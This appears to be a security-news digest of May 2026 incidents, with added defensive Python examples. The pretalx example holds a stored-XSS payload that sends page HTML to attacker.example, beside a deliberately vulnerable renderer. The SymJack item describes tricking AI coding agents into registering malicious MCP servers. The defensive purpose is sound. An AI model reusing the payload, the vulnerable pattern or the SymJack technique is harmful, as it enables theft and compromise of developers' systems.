Why it matters: A compromise of developers can spread to the software and updates many other organizations rely on. Teams should check for beaconing to 164.92.88[.]210, investigate developer machines and repositories for compromise, rotate exposed credentials, and review software supply-chain protections.
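A practical way to hunt for the concealment trick described above is to scan source files for variation selectors and other invisible code points, and to decode any long run of them back into bytes. This is an added example; it is not CrowdStrike's, Google's or Shadowserver's tooling and not the published YARA rules. The byte-to-selector mapping used for decoding (U+FE00..U+FE0F for 0..15, U+E0100..U+E01EF for 16..255) is the commonly documented one and is an assumption about this campaign; the sample source text is constructed.

```python
"""Find and decode code hidden in Unicode variation selectors. Added example,
not the vendors' tooling. The selector-to-byte mapping is an assumption; the
sample source text is constructed."""
import unicodedata
from typing import List, Optional, Tuple

# Zero-width and bidi-control characters that are also invisible in editors.
ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF,
              0x202E, 0x2066, 0x2067, 0x2068, 0x2069}


def selector_to_byte(cp: int) -> Optional[int]:
    """Map a variation selector code point to the byte it can smuggle, else None."""
    if 0xFE00 <= cp <= 0xFE0F:
        return cp - 0xFE00            # VS1..VS16  -> 0..15
    if 0xE0100 <= cp <= 0xE01EF:
        return cp - 0xE0100 + 16      # VS17..VS256 -> 16..255
    return None


def find_hidden_unicode(text: str) -> List[Tuple[int, int, int, str]]:
    """Return (line, column, code point, name) for every invisible character."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            cp = ord(ch)
            if selector_to_byte(cp) is not None or cp in ZERO_WIDTH:
                hits.append((lineno, col, cp, unicodedata.name(ch, "<unnamed>")))
    return hits


def extract_hidden_payloads(text: str, min_run: int = 4) -> List[bytes]:
    """Decode every maximal run of variation selectors into bytes.

    Legitimate uses (emoji presentation, CJK glyph variants) are a single
    selector after a base character, so runs shorter than min_run are ignored.
    """
    payloads: List[bytes] = []
    run = bytearray()
    for ch in text:
        b = selector_to_byte(ord(ch))
        if b is not None:
            run.append(b)
            continue
        if len(run) >= min_run:
            payloads.append(bytes(run))
        run = bytearray()
    if len(run) >= min_run:
        payloads.append(bytes(run))
    return payloads


# Constructed sample: line 2 hides four bytes inside an innocent-looking string;
# line 3 is a benign emoji with VS16 that must be reported but not decoded.
SAMPLE_SOURCE = (
    'const greeting = "hello";\n'
    'const marker = "\U000E0155\U000E0166\U000E0159\U000E015C";\n'
    'const heart = "\u2764\uFE0F";\n'
)

if __name__ == "__main__":
    for line, col, cp, name in find_hidden_unicode(SAMPLE_SOURCE):
        print(f"line {line} col {col}: U+{cp:04X} {name}")
    for payload in extract_hidden_payloads(SAMPLE_SOURCE):
        print("hidden bytes:", payload)
```

Point find_hidden_unicode at every file in a repository, extension, or package tarball before trusting it; a long run of selectors in a .js, .py or .json file has no legitimate reason to exist. Treat decoded payloads as untrusted input: look at the bytes, do not execute them.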
Sources
2026.05.27 99%
This article is another report on the same GlassWorm disruption event, adding operational detail on the takedown timing, the four command-and-control channels hit simultaneously, and specifics on GlassWorm’s use of Solana memos, Google Calendar, BitTorrent DHT, and VPS-hosted payload servers.
Ionut Ilascu 2026.05.27 97%
This is the same underlying event: the coordinated takedown of the GlassWorm botnet. The article adds specific detail on the botnet's resilient command-and-control design across Solana transaction memos, BitTorrent DHT, Google Calendar dead drops, and direct VPS servers, plus a post-takedown beacon IP and mention of published YARA detection rules.
Ionut Arghire 2026.05.27 100%
This article establishes a distinct tracked event: the disruption of the GlassWorm developer-targeting botnet and new details on its multi-channel command-and-control infrastructure, scope across ecosystems, and defender actions.
Pretalx patched stored XSS flaw CVE-2026-41241 that could let conference organizers' accounts be hijacked
Zero-Days & CVEs, Urgent Patches, Technology & Software, Education, Media & Entertainment, Pretalx
Pretalx, an open source platform used by many conferences to manage call-for-proposals and schedules, fixed a flaw that could let a malicious speaker submission run code in an organizer's browser. The issue, CVE-2026-41241, is a stored cross-site scripting (XSS) bug in searchable fields such as submission titles, speaker names, usernames, and email addresses; when an organizer searched for a matching record, attacker-supplied HTML or JavaScript could execute, steal a cross-site request forgery (CSRF) token, submit authenticated actions, or exfiltrate visible data. It was fixed in April in pretalx 2026.1.0.
Why it matters: Conference teams using pretalx could have had proposal data changed or organizer sessions abused by an organizer simply running a search that matched a malicious submission, so affected admins should update to pretalx 2026.1.0 or later and review organizer access and stored submissions. Because pretalx is reused across many events, one product bug can affect multiple independent conference systems at once.
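The bug class above, stored XSS through a search-result renderer, in a minimal vulnerable and hardened pair. This is an added example and not pretalx's own code: the affected template or view in pretalx is not described here, and the submission records, the highlight markup and the exfiltration URL in the payload are constructed.

```python
"""Stored XSS via a search-result highlighter: vulnerable renderer beside the
hardened one, plus a parser-based regression check. Added example, not
pretalx code; records, markup and payload URL are constructed."""
import html
import re
from html.parser import HTMLParser
from typing import Dict, List, Set

# Constructed stored records: a speaker controls their own title and name.
PAYLOAD = ('<img src=x onerror="fetch(\'https://attacker.example/?d=\''
           '+encodeURIComponent(document.documentElement.outerHTML),{mode:\'no-cors\'})">')
SUBMISSIONS: List[Dict[str, str]] = [
    {"title": "Hardening CI pipelines", "speaker": "A. Speaker"},
    {"title": "Keynote" + PAYLOAD, "speaker": "M. Allory"},
]


def highlight(text: str, query: str) -> str:
    """Wrap case-insensitive matches of query in <mark>. The caller decides
    whether text and query have already been made safe for HTML."""
    return re.sub(re.escape(query), lambda m: f"<mark>{m.group(0)}</mark>",
                  text, flags=re.IGNORECASE)


def matching(records: List[Dict[str, str]], query: str) -> List[Dict[str, str]]:
    return [r for r in records if query.lower() in r["title"].lower()]


def render_results_unsafe(records: List[Dict[str, str]], query: str) -> str:
    """Vulnerable: stored field values go into the page verbatim, so the
    organizer's browser runs whatever the speaker typed into the title."""
    rows = [f"<li>{highlight(r['title'], query)} by {r['speaker']}</li>"
            for r in matching(records, query)]
    return "<ul>" + "".join(rows) + "</ul>"


def render_results_safe(records: List[Dict[str, str]], query: str) -> str:
    """Hardened: every untrusted value, the query included, is HTML-escaped
    before any markup is added around it."""
    q = html.escape(query, quote=True)
    rows = [f"<li>{highlight(html.escape(r['title'], quote=True), q)} by "
            f"{html.escape(r['speaker'], quote=True)}</li>"
            for r in matching(records, query)]
    return "<ul>" + "".join(rows) + "</ul>"


class _TagCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []
        self.handlers: List[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.lower().startswith("on"))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


ALLOWED_TAGS = {"ul", "li", "mark"}


def unexpected_markup(rendered: str) -> Set[str]:
    """Tags outside the renderer's own vocabulary, plus any on* handler
    attribute. Parses the output like a browser would, so escaped text that
    merely looks like a tag is not counted."""
    p = _TagCollector()
    p.feed(rendered)
    return {t for t in p.tags if t not in ALLOWED_TAGS} | set(p.handlers)


if __name__ == "__main__":
    print(unexpected_markup(render_results_unsafe(SUBMISSIONS, "keynote")))
    print(unexpected_markup(render_results_safe(SUBMISSIONS, "keynote")))
```

The order of operations is the whole fix: escape first, then add your own markup. Highlighters and "rich" previews are where template auto-escaping is most often switched off, so a test like unexpected_markup that parses the rendered output is worth keeping in the suite for every view that shows one user's text to a more privileged user.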
Sources
Eduard Kovacs 2026.05.27 97%
This is the same underlying event: disclosure of CVE-2026-41241 in Pretalx and its patch in version 2026.1.0. The article adds clearer detail on the attack chain, explaining that a malicious speaker submission could trigger stored XSS when organizers search submissions, enabling organizer account takeover and abuse across multiple Pretalx-powered conferences.
2026.05.27 100%
This article appears to be the first tracked item establishing the pretalx CVE-2026-41241 disclosure, exploit mechanics, and patched version.
India CERT-In tells organizations to patch or isolate exploited internet-facing vulnerabilities within 12 hours
Urgent Patches, Policy & Regulation, Government, Technology & Software, CERT-In
India's national cyber agency has told organizations to fix, mitigate, or disconnect exposed critical systems within 12 hours when a known-exploited vulnerability affects them. In new CERT-In guidance on defending against AI-assisted attacks, the agency says the half-day target applies where feasible to internet-facing or 'crown jewel' systems with exploited n-day flaws, while other cases such as internal systems generally get a 24-hour target; this is guidance rather than a single-CVE advisory.
Why it matters: This raises the urgency for Indian organizations and anyone tracking national cyber guidance as attackers use artificial intelligence to speed up exploitation. Defenders should review patching and mitigation playbooks now so internet-exposed high-value systems can be patched, shielded, or taken offline quickly when active exploitation is known.
Sources
2026.05.27 100%
This article establishes a new trackable story because it centers on a new CERT-In directive-style guidance change setting a 12-hour response expectation for known-exploited flaws, not on any previously listed breach, CVE, or advisory event.
Dutch police arrest suspect in Ajax Amsterdam hack that exposed fan accounts and ticketing controls
Breaches & Data Leaks, Media & Entertainment, Consumers & General Public, Ajax Amsterdam
Dutch police arrested a 35-year-old man suspected of repeatedly breaking into Ajax Amsterdam's computer systems earlier in 2026. Ajax previously said the attacker exploited vulnerabilities in its IT systems to access data on a few hundred people, while reporting indicated exposed application programming interfaces (APIs) and shared keys could let someone view more than 300,000 accounts, alter 538 supporter stadium bans, and reassign 42,000 season tickets; no CVE was cited.
Why it matters: This matters to Ajax fans and the club because the intrusion reportedly reached both personal data and operational controls like bans and ticket transfers. Anyone affected should watch for account abuse or phishing, and organizations should review exposed APIs, shared credentials, and access controls in customer and ticketing systems.
Sources
2026.05.27 99%
This article covers the same underlying Ajax breach and adds that Dutch police arrested a 35-year-old suspect in Buren, searched his home, and seized digital storage devices; it also reiterates that the intrusion involved an unpatched vulnerability and may have affected far more supporters and season tickets than Ajax initially disclosed.
Sergiu Gatlan 2026.05.27 100%
This article establishes a distinct story by tying the previously disclosed Ajax intrusion to a suspect arrest and restating the scope and impact of the breach on fan data and ticketing systems.
Researchers link LA Metro cyberattack to Iranian government hackers after disruptive March breach
Threat Actors & APTs, Malware, Breaches & Data Leaks, Transportation & Logistics, Government, LA Metro, Microsoft
Researchers say the March cyberattack on Los Angeles Metro was likely carried out by Iranian state-linked hackers, not just a self-described hacktivist group. LA Metro said the breach caused internal operational disruption and required hundreds of servers to be checked before restoration, while the attackers claimed to have wiped hundreds of terabytes and stolen more than 1 terabyte of data. Gambit Security linked the operation to infrastructure associated with Black Shadow, a group previously attributed to Iran's Ministry of Intelligence and Security, and said the attackers also accessed systems including virtualization management, Microsoft IIS servers, and a train-monitoring operational technology system.
Why it matters: A breach at a major transit agency raises concern not only about data theft but also about disruption to public services and potential access to operational systems. Transit operators and other public-sector defenders should review exposure of administrative platforms and monitoring systems, hunt for data theft and destructive activity, and treat claimed hacktivist incidents as possible state-backed operations.
Sources
2026.05.27 98%
This is the same underlying event: the March breach of the Los Angeles County Metropolitan Transportation Authority. The article adds that Gambit Security attributes the operation specifically to an Iran MOIS-linked group calling itself Ababil of Minab, describes destructive activity against databases, virtual machines, storage volumes, and backups, and notes additional victims in Israel, Turkey, Saudi Arabia, and other sectors.
Eduard Kovacs 2026.05.27 100%
This article establishes a distinct tracked story by adding substantive attribution and technical context to the previously reported LA Metro breach, tying the incident to Iranian state-linked infrastructure and broader targeting.
Researchers show 'SymJack' attack can trick Claude Code, Copilot CLI, Gemini CLI and other AI coding agents into installing malicious tools
Supply Chain, Social Engineering & Phishing, Technology & Software, Anthropic, Google, GitHub, Cursor, xAI
Researchers say attackers can abuse trusted-looking project files in code repositories to make AI coding agents install attacker-controlled components and run malicious code on a developer's machine or in continuous integration (CI) systems. Adversa's 'SymJack' technique uses disguised symbolic links (symlinks) and a copy command to silently register a malicious Model Context Protocol (MCP) server; the firm says it worked against Claude Code, Gemini CLI, Antigravity CLI, Cursor Agent CLI, Grok Build CLI, and GitHub Copilot CLI, and published a proof of concept on GitHub. Anthropic reportedly hardened Claude Code to resolve symlinks before approval and show the true destination path.
Why it matters: Teams using AI coding agents could unknowingly approve changes that steal SSH keys, cloud tokens, browser sessions, or CI secrets and then push malicious code downstream. This is urgent for developers and DevOps teams using agentic coding tools: review repository trust assumptions, restrict or audit MCP server registration, scrutinize file-copy prompts, and apply vendor mitigations where available.
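The mitigation the page attributes to Anthropic, resolving symlinks before asking for approval, generalizes to any tool that copies files on a user's behalf. Below is an added example of that check, not Adversa's SymJack proof of concept and not any vendor's implementation: it refuses a copy whose destination passes through a symlink or resolves outside the repository, and demonstrates it against a throwaway repo whose docs/templates directory is an attacker-committed symlink into a made-up agent config directory.

```python
"""Resolve a proposed copy destination before approving it. Added example, not
Adversa's PoC or a vendor mitigation; repo layout, the 'templates' symlink and
the agent config path are constructed for the demo."""
import os
import tempfile
from pathlib import Path
from typing import NamedTuple, Tuple


class Verdict(NamedTuple):
    allowed: bool
    real_path: str
    reason: str


def check_copy_destination(repo_root: str, dest: str) -> Verdict:
    """Decide whether an agent may write to `dest` (given relative to the repo).

    Two independent checks: no component of dest may be a symlink, and the
    fully resolved path must stay inside the resolved repository root.
    """
    root = Path(repo_root).resolve(strict=True)
    walked = Path(repo_root)
    symlinked = []
    for part in Path(dest).parts:
        walked = walked / part
        if walked.is_symlink():           # False for components that do not exist yet
            symlinked.append(str(walked))
    real = walked.resolve()               # follows every link, including a final one
    inside = real == root or root in real.parents
    shown = os.path.join(repo_root, dest)
    if symlinked:
        return Verdict(False, str(real),
                       f"{shown} passes through symlink(s) {symlinked} and really points at {real}")
    if not inside:
        return Verdict(False, str(real), f"{shown} escapes the repository: resolves to {real}")
    return Verdict(True, str(real), "inside repository, no symlinks")


def demo() -> Tuple[Verdict, Verdict, Verdict]:
    """Throwaway repo with a malicious symlink; returns verdicts for a benign
    copy, a symlink-hijacked copy and a plain ../ traversal."""
    with tempfile.TemporaryDirectory() as tmp:
        repo = Path(tmp, "repo")
        (repo / "docs").mkdir(parents=True)
        home = Path(tmp, "home")                      # stands in for the developer's home
        agent_cfg = home / ".config" / "agent"        # hypothetical agent config directory
        agent_cfg.mkdir(parents=True)
        # The repository ships 'docs/templates' as a symlink into the user's config dir.
        os.symlink(agent_cfg, repo / "docs" / "templates")
        return (
            check_copy_destination(str(repo), "docs/README.md"),
            check_copy_destination(str(repo), "docs/templates/mcp.json"),
            check_copy_destination(str(repo), "../home/.config/agent/mcp.json"),
        )


if __name__ == "__main__":
    for verdict in demo():
        print("ALLOW" if verdict.allowed else "DENY ", verdict.reason)
```

The important property is that the path shown to the user in the approval prompt is the resolved one, so "copy to docs/templates/mcp.json" is presented as what it really is, a write into the agent's configuration. The same resolution step belongs in front of any MCP server registration, hook, or settings file an agent is willing to create from repository content.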
Sources
Kevin Townsend 2026.05.27 100%
This article appears to be the initial reporting of the SymJack technique as a named, cross-vendor attack pattern with a public proof of concept and documented vendor responses.
CISA adds exploited LiteSpeed cPanel plugin zero-day CVE-2026-48172 to KEV and urges immediate removal or patching
Urgent Patches, Zero-Days & CVEs, Technology & Software, Government, CISA, LiteSpeed, cPanel
CISA says a critical bug in the LiteSpeed user-end plugin for cPanel is being actively exploited and can give attackers root-level control of affected servers. The flaw, CVE-2026-48172, is a 9.8-severity privilege-escalation vulnerability affecting user-end plugin versions 2.3 through 2.4.4; LiteSpeed fixed it in version 2.4.5, later bundled in WHM Plugin 5.3.1.0 with user-end plugin 2.4.7, while cPanel also removed the vulnerable plugin via a nightly update on May 19.
Why it matters: Organizations running cPanel with the LiteSpeed user-end plugin could be exposed to full server compromise, so this is an update-now or remove-now situation. Admins should upgrade immediately, remove the plugin if they cannot patch, and review logs and suspicious IP activity for signs of exploitation.
Sources
Sergiu Gatlan 2026.05.27 98%
This article covers the same underlying event—active exploitation of LiteSpeed cPanel plugin flaw CVE-2026-48172 and CISA's KEV action—and adds the concrete BOD 22-01 deadline giving U.S. federal agencies four days, until May 29, 2026, to patch or discontinue use.
Ionut Arghire 2026.05.27 100%
This article establishes a new tracked story centered on CVE-2026-48172: an actively exploited LiteSpeed cPanel plugin zero-day, its vendor fix, cPanel mitigation, and CISA KEV listing.
Attackers exploited KnowledgeDeliver zero-day CVE-2026-5426 to install web shells and backdoors on LMS servers
Zero-Days & CVEs, Malware, Threat Actors & APTs, Education, Technology & Software, Digital Knowledge
Hackers used a previously unknown flaw in Digital Knowledge’s KnowledgeDeliver learning platform to break into servers and plant persistent malware. Mandiant says CVE-2026-5426 affects KnowledgeDeliver deployments before February 24, 2026, because a standardized ASP.NET web.config file contained hardcoded machineKey values, enabling ViewState deserialization attacks for remote code execution. The observed intrusions deployed Godzilla web shells, altered JavaScript to show fake plugin alerts, and ultimately installed a tailored Cobalt Strike backdoor.
Why it matters: Organizations using KnowledgeDeliver, especially enterprise and education users, may already be compromised, not just vulnerable. Admins should urgently rotate machine keys, restrict access to the LMS, hunt for the published indicators of compromise, and check for web shells, modified JavaScript, and follow-on malware.
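The root cause above, one web.config with static machineKey values shipped to every customer, is easy to audit for and easy to fix per installation. The example below is added here and is not Mandiant's or Digital Knowledge's code; it flags static keys in a web.config, spots the same key reused across several hosts, and generates a fresh per-server machineKey element. The sample configs and their key values are constructed.

```python
"""Audit ASP.NET <machineKey> settings for shared static keys and generate a
per-installation replacement. Added example, not vendor code; the sample
configs and key values are constructed."""
import secrets
import xml.etree.ElementTree as ET
from typing import Dict, List


def audit_machine_key(web_config_xml: str) -> List[str]:
    """Return findings for the <system.web><machineKey> element, if present."""
    root = ET.fromstring(web_config_xml)
    mk = root.find("./system.web/machineKey")
    if mk is None:
        return []   # keys are auto-generated per machine; nothing to share
    findings = []
    for attr in ("validationKey", "decryptionKey"):
        value = mk.get(attr, "AutoGenerate,IsolateApps")   # ASP.NET default when absent
        if value.startswith("AutoGenerate"):
            continue
        findings.append(f"{attr} is a static {len(value)}-char value; anyone holding "
                        f"this file can sign ViewState for this site")
    if mk.get("enableViewStateMac", "true").lower() != "true":
        findings.append("enableViewStateMac is disabled: ViewState is not authenticated at all")
    if mk.get("validation", "").upper() in ("MD5", "SHA1"):
        findings.append(f"validation={mk.get('validation')} is legacy; use HMACSHA256 or stronger")
    return findings


def shared_keys(configs: Dict[str, str]) -> Dict[str, List[str]]:
    """Map every static validationKey that appears on more than one host to those hosts."""
    seen: Dict[str, List[str]] = {}
    for host, xml_text in configs.items():
        mk = ET.fromstring(xml_text).find("./system.web/machineKey")
        key = mk.get("validationKey", "") if mk is not None else ""
        if key and not key.startswith("AutoGenerate"):
            seen.setdefault(key, []).append(host)
    return {k: hosts for k, hosts in seen.items() if len(hosts) > 1}


def fresh_machine_key_element() -> str:
    """New random keys for one installation (sizes match what IIS generates
    for HMACSHA256 validation and AES decryption)."""
    validation_key = secrets.token_hex(64).upper()   # 64 bytes
    decryption_key = secrets.token_hex(32).upper()   # 32 bytes, AES-256
    return (f'<machineKey validationKey="{validation_key}" decryptionKey="{decryption_key}" '
            'validation="HMACSHA256" decryption="AES" />')


# Constructed samples: one static key shared by two hosts, one host auto-generating.
STATIC_KEY = "0123456789ABCDEF" * 8
STATIC_CONFIG = f"""<configuration>
  <system.web>
    <machineKey validationKey="{STATIC_KEY}" decryptionKey="{'FEDCBA9876543210' * 4}"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""
AUTO_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    for finding in audit_machine_key(STATIC_CONFIG):
        print("static host:", finding)
    print("shared across:", shared_keys({"lms-a": STATIC_CONFIG, "lms-b": STATIC_CONFIG,
                                         "lms-c": AUTO_CONFIG}))
    print(fresh_machine_key_element())
```

Rotating the key invalidates every existing ViewState and any forms-auth tickets signed with it, so do it during a maintenance window and on every node of a web farm at once. A rotation does not evict an attacker who already has a web shell: hunt for the indicators first, then rotate, then monitor for new ViewState errors in the event log, which are what forgery attempts with the old key now produce.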
Sources
Ionut Ilascu 2026.05.26 98%
This article is a direct update on the same Mandiant-reported event, adding technical detail that the unauthenticated flaw was a ViewState deserialization issue caused by shared hardcoded ASP.NET machine keys, and that attackers deployed the Godzilla web shell, altered JavaScript to push a fake 'security authentication plugin,' and delivered Cobalt Strike.
Ionut Arghire 2026.05.26 100%
This article establishes a distinct new incident: in-the-wild exploitation of KnowledgeDeliver zero-day CVE-2026-5426, including the attack chain, malware used, affected versions, and mitigation steps.
Play ransomware gang lists MyPillow as an alleged victim and threatens to leak stolen company and employee data
Ransomware, Breaches & Data Leaks, Retail & E-Commerce, Manufacturing, Consumers & General Public, MyPillow
Play ransomware operators have posted MyPillow to their leak site, claiming they stole sensitive internal data and will publish it if the company does not pay. According to the gang’s dark-web extortion post, the alleged haul includes personal and confidential data, client documents, budgets, payroll records, IDs, tax files, and finance information. The article does not provide technical details on the intrusion method, affected systems, or data volume, and MyPillow had not confirmed the breach at publication time.
Why it matters: If the claim is accurate, employees, customers, and business partners could face privacy risks, fraud, or follow-on phishing using stolen records. Defenders should watch for confirmation, review for signs of Play ransomware activity, and prepare incident-response, notification, and credential-reset steps if exposure is verified.
Sources
2026.05.26 100%
This article appears to be the first report in the provided set identifying MyPillow as a new alleged Play ransomware victim, establishing a distinct incident rather than updating an existing tracked story.
Lithuania investigates leak of more than 600,000 national register records after suspected foreign access using institutional credentials
Breaches & Data Leaks, Threat Actors & APTs, Government, Consumers & General Public, Lithuanian Prosecutor General's Office, Centre of Registers
Lithuania says more than 600,000 entries from national data registers were leaked after someone used login credentials belonging to authorized institutions. Prosecutors said the exposed data mainly came from real-estate and legal-entity registers, authorities suspect a foreign country was involved, and access was tightened by blocking suspected accounts and forcing credential updates.
Why it matters: This is a major government-data exposure with potential risks to ordinary citizens as well as officials, diplomats, and security personnel. Organizations with access to Lithuanian state registers should urgently review account use, rotate credentials, and check for unauthorized queries or data exports.
Sources
2026.05.26 98%
This article is the same underlying event and adds details on the affected registers (Real Estate and Legal Entities), the types of data exposed, the use of institutional login credentials, the timeline of detection and delayed disclosure, account-blocking and credential-reset measures, estimated financial damage, and the resignation of the Centre of Registers chief.
Associated Press 2026.05.26 100%
This article establishes a distinct new story: a large-scale leak from Lithuanian national registers tied to misuse of authorized-access credentials and possible foreign intelligence involvement.
Iran-linked Nimbus Manticore targets aviation and software companies with new MiniFast backdoor and fake job lures
Threat Actors & APTs, Malware, Social Engineering & Phishing, Defense & Aerospace, Technology & Software, OnlyOffice, Zoom, Oracle
An Iran-linked hacking group is using fake job offers and trojanized software downloads to break into aviation and software companies, including targets in Saudi Arabia, Australia, and the United States. Check Point says Nimbus Manticore (also known as Bohrium, TA455, and UNC1549) switched from DLL sideloading to AppDomain hijacking, using malicious .NET configuration files to load payloads, and deployed updated MiniJunk malware plus a new Windows DLL backdoor called MiniFast through ZIP files on OnlyOffice, a fake Zoom installer, and a fake SQL Developer site boosted with search-engine optimization.
Why it matters: This campaign shows continued state-linked targeting of sensitive industries during heightened regional tensions, with lures that can fool both job seekers and employees downloading familiar tools. Organizations in aviation, defense-adjacent, and software sectors should warn staff about recruiter and installer lures, review detections for MiniJunk and MiniFast, and hunt for suspicious .config-based AppDomain hijacking activity.
Sources
Ionut Arghire 2026.05.26 100%
The article establishes a distinct new campaign and tooling update for Nimbus Manticore, including a new backdoor, new execution technique, and an apparent expansion toward U.S. targets rather than simply re-reporting a previously tracked event.
7-Eleven discloses breach of franchisee document systems after ShinyHunters claims
Threat Actors & APTs, Breaches & Data Leaks, Retail & E-Commerce, Consumers & General Public, 7-Eleven, Salesforce
7-Eleven disclosed that attackers accessed systems used to store franchisee documents, with stolen data including names, addresses, and Social Security numbers. The company said it discovered the breach on April 8 and reported it to state regulators in Maine, Vermont, and Massachusetts. The disclosure follows ShinyHunters' late-April claim that it stole 7-Eleven data allegedly stored on Salesforce.
Why it matters: The breach exposes sensitive personal data tied to U.S. franchise operations, creating identity theft and follow-on phishing risk for affected individuals. Defenders and franchisees should watch for extortion fallout, credential abuse, and notices clarifying scope and attack path.
Sources
Ionut Arghire 2026.05.26 98%
This is the same underlying April 2026 7-Eleven breach involving franchise-document systems and ShinyHunters' claimed theft of Salesforce records. The article adds a likely victim count from HaveIBeenPwned (about 185,300 people) and says the leaked data includes names, addresses, email addresses, and dates of birth, with some records containing additional fields.
Sergiu Gatlan 2026.05.26 98%
This is the same April 2026 7-Eleven breach of systems used to store franchisee documents; the new reporting adds an estimated victim count of 185,300 people from Have I Been Pwned and specifies exposed fields including names, dates of birth, email addresses, phone numbers, and physical addresses, while reiterating ShinyHunters' claimed link to a Salesforce-related compromise.
2026.05.20 100%
This article establishes a distinct breach event at 7-Eleven and provides the first concrete confirmation of stolen franchisee data following ShinyHunters' public claims.
Dutch investigators seize 800 servers tied to Stark Industries hosting network allegedly used for cyberattacks and disinformation
Policy & Regulation, Disinformation & Influence Ops, Threat Actors & APTs, Technology & Software, Government, Stark Industries, Dutch Police, Dutch Public Prosecution Service
Dutch authorities say they seized 800 servers and arrested two men linked to a hosting operation that allegedly helped cyberattacks, disruption campaigns, and online disinformation. Investigators said the action targeted infrastructure connected to Stark Industries, an EU-sanctioned hosting provider, and two Dutch companies allegedly used to keep its services running after sanctions; reporting links the network to pro-Russian distributed denial-of-service (DDoS) activity by NoName057(16).
Why it matters: This matters because the seizure hits infrastructure allegedly used to support both cyberattacks and influence operations in Europe. Defenders, hosting providers, and abuse teams should watch for fallout such as service migration, replacement infrastructure, and renewed DDoS activity from the same actors.
Sources
Ionut Arghire 2026.05.26 98%
This article is a direct update on the Stark Industries case, adding that Dutch authorities arrested two administrators of Dutch companies allegedly acting as fronts and infrastructure providers for the sanctioned hosting network, and confirming seizures at data centers and searches tied to Mirhosting and WorkTitans.
2026.05.25 98%
This article is a direct update on the same Dutch/Stark Industries enforcement action, adding that two Dutch IT entrepreneurs were arrested, naming the suspected related firms via reporting, and detailing allegations that the infrastructure was used by the Doppelgänger-linked Reliable Recent News network and in NoName057(16) DDoS attacks while evading EU sanctions.
BrianKrebs 2026.05.25 99%
This article appears to cover the same underlying event: Dutch authorities arrested two operators linked to MIRhosting and WorkTitans, searched multiple sites, and seized more than 800 servers tied to the Stark Industries network allegedly used in Russia-linked cyberattacks and disinformation. It adds names of the suspects, the sanctions-evasion allegations, and reporting tying the infrastructure to attacks on Danish government bodies during the 2025 municipal election period.
Bill Toulas 2026.05.22 100%
This article establishes a distinct new story: a Dutch law-enforcement action against Stark Industries-linked hosting infrastructure allegedly enabling cyberattacks and disinformation, not the previously tracked seizure of the separate First VPN service.
Drupal core SQL injection CVE-2026-9082 exploited in the wild after critical security update for versions 8 and later
Zero-Days & CVEs, Urgent Patches, Technology & Software, Drupal
Drupal announced a core security release for May 20, 2026, warning that exploits could appear within hours of disclosure. The flaw, tracked as CVE-2026-9082 once the patch shipped, is a highly critical SQL injection affecting PostgreSQL-backed Drupal core 8+ deployments that can lead to unauthenticated remote code execution; fixes landed in the supported 11.x and 10.x branches, with best-effort hotfixes for end-of-life 9.5 and 8.9. Exploitation attempts were observed within days, CISA added the bug to its KEV catalog, and Imperva reported more than 15,000 attempts against nearly 6,000 sites in 65 countries.
Why it matters: Drupal is widely used by government, education, healthcare, and large organizations, and this flaw is already being exploited, so PostgreSQL-backed sites should be updated immediately; U.S. federal agencies have a BOD 22-01 deadline of May 27, 2026. Sites on other databases are not reported as affected by this issue but should still take the release.
Sources
Sergiu Gatlan 2026.05.26 94%
This article updates the same Drupal vulnerability event by adding that the flaw is tracked as CVE-2026-9082, is being actively exploited, has been added to CISA's KEV catalog, and now carries a Binding Operational Directive deadline for U.S. federal agencies to patch by May 27, 2026.
info@thehackernews.com (The Hacker News) 2026.05.23 94%
This appears to update the same Drupal core vulnerability event by adding that the flaw is being actively exploited and has now been added to CISA's KEV catalog, increasing urgency beyond the original critical update notice.
Eduard Kovacs 2026.05.22 96%
This is the direct follow-up to the same Drupal event, adding that CVE-2026-9082 is now seeing exploitation attempts in the wild, that Drupal raised its risk score, and that Imperva observed more than 15,000 attempts targeting nearly 6,000 sites across 65 countries.
Bill Toulas 2026.05.22 98%
This is a direct update to the same Drupal core flaw disclosed earlier in the week, adding the key new fact that exploit attempts for CVE-2026-9082 have now been detected in the wild and reiterating affected branches and upgrade guidance.
Eduard Kovacs 2026.05.21 97%
This article is the follow-up patch release for the same Drupal security event, adding the CVE identifier (CVE-2026-9082), technical details about the PostgreSQL SQL injection flaw, impact including possible unauthenticated RCE, and the fixed version branches.
info@thehackernews.com (The Hacker News) 2026.05.21 97%
This appears to cover the same May 2026 Drupal core security release, adding that the flaw is highly critical, affects PostgreSQL-based Drupal deployments, and can expose affected sites to remote code execution attacks.
Bill Toulas 2026.05.20 100%
This article establishes a new story because it is the initial report of a specific Drupal core security release tied to a high-exploitation-risk vulnerability, and it does not match any existing tracked event.
2026.05.19 98%
This article covers the same pre-disclosure Drupal core security release window for May 20, 2026, adding detail on affected branches including best-effort patches for unsupported 8.9 and 9.5, the advisory's severity characterization, and Drupal's warning to reserve immediate patch time because exploit code could follow quickly.
Kremlin appoints former Rostec cyber executive reportedly linked to GRU Unit 26165 to Russian Security Council post
Threat Actors & APTs, Disinformation & Influence Ops, Government, Defense & Aerospace, Technology & Software, Kremlin, Russian Security Council, Rostec, RT-Information Security, GRU
Russia has appointed a former cybersecurity executive reportedly tied to a military intelligence hacking unit to a senior Security Council role. The Record reports that Andrei Kozlov, formerly of Rostec's RT-Information Security and a Russian cybersecurity industry association, was named an aide to Security Council Secretary Sergei Shoigu; leaked data cited by The Insider allegedly links him to GRU Military Unit 26165, widely tracked as Fancy Bear or APT28, a group long accused of espionage, credential theft and influence operations.
Why it matters: This matters because it may show direct overlap between Russia's state security leadership and a unit publicly tied to past hacking and disinformation campaigns. Defenders and policymakers should treat it as contextual evidence when tracking future APT28 operations, influence activity and Russian state cyber posture.
Sources
2026.05.25 100%
This article establishes a new story about a Russian state appointment with alleged ties to GRU Unit 26165/Fancy Bear, rather than updating an existing tracked breach, malware campaign, or policy case.
